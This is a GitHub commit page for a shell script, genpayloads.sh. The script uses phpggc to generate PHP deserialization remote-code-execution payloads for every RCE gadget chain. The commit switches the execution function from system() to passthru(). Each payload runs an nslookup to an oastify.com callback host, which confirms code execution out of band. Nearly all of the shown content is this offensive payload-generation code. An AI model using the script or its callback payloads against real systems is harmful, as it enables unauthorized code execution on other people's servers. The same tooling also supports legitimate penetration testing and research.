Skip to content

Commit

Permalink
Update genpayloads.sh
Browse files Browse the repository at this point in the history
start using passthru() instead of system()
  • Loading branch information
ricardojba authored Nov 26, 2022
1 parent c861944 commit ae45076
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion genpayloads.sh
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
#!/bin/bash

# based on https://gist.github.com/honoki/029425e61e829a9344558c8587c29f0f#file-phpggc-generate-payloads-sh
function="system"
function="passthru"
command="nslookup poi-slinger.aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa.oastify.com"
options="-s"
~/phpggc/phpggc -l | /bin/grep RCE | cut -d' ' -f1 | xargs -L 1 ~/phpggc/phpggc -i | /bin/grep 'phpggc ' --line-buffered |
Expand Down

0 comments on commit ae45076

Please sign in to comment.